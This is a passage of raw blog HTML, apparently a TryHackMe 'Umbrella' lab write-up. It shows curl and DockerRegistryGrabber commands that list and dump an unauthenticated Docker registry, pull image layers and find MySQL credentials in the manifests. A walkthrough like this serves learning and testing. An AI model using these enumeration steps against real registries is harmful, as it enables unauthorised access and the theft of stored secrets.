data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"2.-image\" data-image-description=\"\" data-image-caption=\"\" 
data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?fit=1024%2C78&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?resize=1024%2C78&#038;ssl=1\" alt=\"\" class=\"wp-image-109\" style=\"width:1352px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?resize=1024%2C78&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?resize=300%2C23&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?resize=768%2C58&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?w=1396&amp;ssl=1 1396w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Authentication<\/mark><\/h2>\n\n\n\n<p>The Docker registry may also be configured to require <strong>authentication<\/strong>:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" 
stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"curl -k https:\/\/192.25.197.3:5000\/v2\/_catalog\n#If Authentication required\n{&quot;errors&quot;:[{&quot;code&quot;:&quot;UNAUTHORIZED&quot;,&quot;message&quot;:&quot;authentication required&quot;,&quot;detail&quot;:[{&quot;Type&quot;:&quot;registry&quot;,&quot;Class&quot;:&quot;&quot;,&quot;Name&quot;:&quot;catalog&quot;,&quot;Action&quot;:&quot;*&quot;}]}]}\n#If no authentication required\n{&quot;repositories&quot;:[&quot;alpine&quot;,&quot;ubuntu&quot;]}\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-k<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">https:\/\/192.25.197.3:5000\/v2\/_catalog<\/span><\/span>\n<span class=\"line\"><span style=\"color: #676E95; font-style: italic\">#If Authentication required<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><span style=\"color: #FFCB6B\">&quot;errors&quot;<\/span><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #BABED8\">[{&quot;<\/span><span 
style=\"color: #FFCB6B\">code<\/span><span style=\"color: #FFCB6B\">&quot;:&quot;<\/span><span style=\"color: #FFCB6B\">UNAUTHORIZED<\/span><span style=\"color: #FFCB6B\">&quot;,&quot;<\/span><span style=\"color: #FFCB6B\">message<\/span><span style=\"color: #FFCB6B\">&quot;:&quot;<\/span><span style=\"color: #FFCB6B\">authentication<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">required<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">detail<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:[{<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Type<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">registry<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Class<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:<\/span><span style=\"color: #89DDFF\">&quot;&quot;<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Name<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">catalog<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Action<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: 
#C3E88D\">}]}]}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">#If no authentication required<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">{<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">repositories<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">:[<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">alpine<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">ubuntu<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">]}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:38px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>In our case, the registry does not require authentication.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"71\" data-attachment-id=\"112\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/3-images\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?fit=1393%2C96&amp;ssl=1\" data-orig-size=\"1393,96\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"3.-Images\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?fit=1024%2C71&amp;ssl=1\" 
src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?resize=1024%2C71&#038;ssl=1\" alt=\"\" class=\"wp-image-112\" style=\"width:1327px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?resize=1024%2C71&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?resize=300%2C21&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?resize=768%2C53&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/3.-Images.png?w=1393&amp;ssl=1 1393w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">DockerRegistryGrabber<\/mark><\/h3>\n\n\n\n<p>We can run the tool to list all the repositories in the Docker registry. We only have one:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" 
data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/Tools\/DockerRegistryGrabber]\n\u2514\u2500$ python3 drg.py http:\/\/10.10.166.146 --list     \n[+] umbrella\/timetracking  \" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/Tools\/DockerRegistryGrabber<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">drg.py<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.10.166.146<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">--list<\/span><span style=\"color: #BABED8\">     <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> umbrella\/timetracking  
<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:31px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can now dump the registry by running the below command:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/Tools\/DockerRegistryGrabber]\n\u2514\u2500$ python3 drg.py http:\/\/10.10.166.146 --dump_all\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 
2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/Tools\/DockerRegistryGrabber<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">drg.py<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.10.166.146<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">--dump_all<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"551\" data-attachment-id=\"113\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/5-image\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?fit=1365%2C734&amp;ssl=1\" data-orig-size=\"1365,734\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"5.-Image\" data-image-description=\"\" data-image-caption=\"\" 
data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?fit=1024%2C551&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?resize=1024%2C551&#038;ssl=1\" alt=\"\" class=\"wp-image-113\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?resize=1024%2C551&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?resize=300%2C161&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?resize=768%2C413&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/5.-Image.png?w=1365&amp;ssl=1 1365w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:37px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The output will be a bunch of tar files, informally called &#8220;blobs&#8221;.<\/p>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>When you build a Docker image, each instruction in the Dockerfile creates a new layer. These layers are stored in a Docker image registry, such as Docker Hub. 
The term \u201cblob\u201d might be informally used to refer to these layers or the binary data associated with them.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:27px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"294\" data-attachment-id=\"120\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/6-image\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?fit=1337%2C384&amp;ssl=1\" data-orig-size=\"1337,384\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"6.-Image\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?fit=1024%2C294&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?resize=1024%2C294&#038;ssl=1\" alt=\"\" class=\"wp-image-120\" style=\"width:1066px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?resize=1024%2C294&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?resize=300%2C86&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?resize=768%2C221&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/6.-Image.png?w=1337&amp;ssl=1 1337w\" sizes=\"auto, 
(max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:29px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>We will need to extract these files into separate folders so that they don\u2019t get overwritten.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>I tried going through all the files but couldn&#8217;t find anything useful. So I decided to move on with further enumeration.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Enumerating With cURL<\/mark><\/h2>\n\n\n\n<p>Once you have <strong>obtained access to the Docker registry<\/strong>, here are some commands you can use to enumerate it:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"#List repositories\ncurl -s http:\/\/10.10.10.10:5000\/v2\/_catalog\n{&quot;repositories&quot;:[&quot;alpine&quot;,&quot;ubuntu&quot;]}\n\n#Get tags of a 
repository\ncurl -s http:\/\/192.251.36.3:5000\/v2\/ubuntu\/tags\/list\n{&quot;name&quot;:&quot;ubuntu&quot;,&quot;tags&quot;:[&quot;14.04&quot;,&quot;12.04&quot;,&quot;18.04&quot;,&quot;16.04&quot;]}\n\n#Get manifests\ncurl -s http:\/\/192.251.36.3:5000\/v2\/ubuntu\/manifests\/latest\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #676E95; font-style: italic\">#List repositories<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.10.10.10:5000\/v2\/_catalog<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><span style=\"color: #FFCB6B\">&quot;repositories&quot;<\/span><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #BABED8\">[<\/span><span style=\"color: #FFCB6B\">&quot;alpine&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;ubuntu&quot;<\/span><span style=\"color: #FFCB6B\">]}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #676E95; font-style: 
italic\">#Get tags of a repository<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/192.251.36.3:5000\/v2\/ubuntu\/tags\/list<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><span style=\"color: #FFCB6B\">&quot;name&quot;<\/span><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #FFCB6B\">&quot;ubuntu&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;tags&quot;<\/span><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #BABED8\">[<\/span><span style=\"color: #FFCB6B\">&quot;14.04&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;12.04&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;18.04&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;16.04&quot;<\/span><span style=\"color: #FFCB6B\">]}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #676E95; font-style: italic\">#Get manifests<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/192.251.36.3:5000\/v2\/ubuntu\/manifests\/latest<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Carefully going through the output, we will see MySQL database credentials.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"717\" height=\"331\" data-attachment-id=\"126\" 
